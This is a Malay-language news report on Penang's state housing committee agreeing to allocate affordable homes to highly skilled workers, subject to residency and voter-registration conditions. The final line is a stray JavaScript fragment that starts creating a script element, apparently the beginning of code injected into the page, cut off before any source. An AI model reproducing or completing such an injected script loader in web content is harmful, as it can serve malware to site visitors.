KN tawar rumah mampu milik untuk golongan mahir, tertakluk pada syarat

GEORGE TOWN – Kerajaan Negeri bakal memperuntukkan sejumlah perumahan kos sederhana dan mampu milik kepada rakyat Malaysia yang mempunyai kemahiran dan kompentasi tinggi serta berbakat besar bagi menggalakkan golongan berkaitan terus menetap di negeri ini.

Exco Perancangan Bandar & Desa dan Perumahan, Jagdeep Singh Deo dalam sidang medianya berkata, Jawatankuasa Pembersihan Proses Perolehan Perumahan (SPEC) telah bersetuju dengan cadangan dikemukakan oleh badan industri Kerajaan Negeri, investPenang (iP) agar sejumlah peratusan penjualan rumah diperuntukan kepada golongan berkemahiran tinggi yang berkerja dan menyumbang bakti terhadap kelestarian pembangunan ekonomi negeri Pulau Pinang.

Jelasnya, iP mengemukakan cadangan tersebut berdasarkan kaji selidik yang dilakukan baru-baru ini iaitu dianggarkan sejumlah 13,088 peluang pekerjaan baharu diramal akan wujud terutama dalam bidang kejuruteraan, perakaunan dan teknologi tinggi menjelang tahun 2017.

“Berdasarkan kriteria dan kaji selidik dikemukakan investPenang (iP), SPEC telah bersetuju untuk menerima cadangan tersebut, tetapi ianya tertakluk kepada beberapa pematuhan dan kelayakan yang telah ditetapkan oleh SPEC sebelum ini.

“SPEC tidak akan menetapkan peratusan tertentu dari mana-mana projek perumahan untuk golongan ini, tetapi akan menimbang permohonan mereka mengikut garis panduan dan pematuhan yang telah ditetapkan,” katanya pada sidang media di sini baru-baru ini.

Hadir sama, Ahli-ahli Jawatankuasa SPEC lain iaitu Exco Hal Ehwal Agama, Perdagangan Dalam Negeri dan Hal Ehwal Pengguna, Dato’ Abdul Malik Abul Kassim; Exco Kebajikan, Masyarakat Penyayang dan Alam Sekitar, Phee Boon Poh dan Ong Chin Wen (Ahli Dewan Undangan Negeri, ADUN Bukit Tengah).

Tambah Jagdeep, SPEC juga dalam masa sama perlu memenuhi permintaan rakyat Pulau Pinang yang telah ada dalam senarai menunggu dan senarai pertimbangan SPEC.

“Bagi mengelakkan ‘kategori’ baharu ini disalah guna, antara syarat yang telah kita (SPEC) tetapkan adalah pemohon diwajibkan tinggal di Pulau Pinang sekurang-kurangnya selama lima tahun dan juga pengundi berdaftar di negeri ini,” jelas beliau.

var d=document;var s=d.createElement(‘script’);